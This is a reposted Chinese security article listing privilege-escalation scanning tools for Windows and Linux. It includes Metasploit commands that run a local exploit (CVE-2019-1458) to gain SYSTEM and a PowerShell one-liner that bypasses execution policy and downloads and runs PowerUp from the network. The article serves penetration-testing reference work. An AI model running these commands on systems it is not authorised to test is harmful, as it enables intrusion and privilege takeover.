网络安全

当前位置:首页>新闻中心>网络安全
全部 192 公司动态 19 行业动态 74 社会热点 24 普查动态 44 网络安全 31

干货|提权扫描工具一览

时间:2023-03-31   访问量:1285

使用Windows-Exploit-Suggester解析systeminfo

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

./windows-exploit-suggester.py

使用Linux-Exploit-Suggester.sh寻找linux提权问题

https://github.com/mzet-/linux-exploit-suggester

./linux-exploit-suggester.sh

使用Sherlock

https://github.com/rasta-mouse/Sherlock

Import-Module Sherlock.ps1
Find-AllVulns

使用msf查询补丁和可利用提权漏洞

# 查询补丁meterpreter> run post/windows/gather/enum_patches [+] KB2999226 installed on 11/25/2020[+] KB976902 installed on 11/21/2010
# 查询Expmsf> use post/multi/recon/local_exploit_suggester msf> set LHOST <攻击机IP>msf> set SESSION <session_id>msf> run
# 利用示例msf> use exploit/windows/local/cve_2019_1458_wizardopium msf> set SESSION <session_id>msf> runmeterpreter> getuidServer username: NT AUTHORITYSYSTEM

使用powerup检查提权漏洞


powershell.exe -exec bypass -Command "& {Import-Module .PowerUp.ps1; 
Invoke-AllChecks}"
powershell.exe -nop -exec bypass -c "IEX (New-object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-
AllChecks"

使用accesschk.exe对系统扫描发现高权限可执行程序,且能够被低权限用户更改

accesschk "d:dir"查看所有用户在d盘dir路径的子路径的权限
accesschk "Administrator "d:dir"查看Administrator用户在d盘dir路径的子路径的权限
accesschk Administrators -c *查看Administrators组对所有服务的权限
accesschk -k Guest hklmsoftware查看Guest用户对hklmsoftware注册表的权限
accesschk -ou User查看User用户对全局对象的权限


转自Leticia's Blog


侵权请私聊公众号(LemonSec)删文


本文作者:Lemon

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/198190.html


上一篇:记一次若依后台管理系统渗透

下一篇:列目录引起的一系列高危漏洞并获取一万五千元赏金记录

在线咨询

点击这里给我发消息 售前咨询专员

点击这里给我发消息 售后服务专员

在线咨询

免费通话

24小时免费咨询

请输入您的联系电话,座机请加区号

免费通话

微信扫一扫

微信联系
返回顶部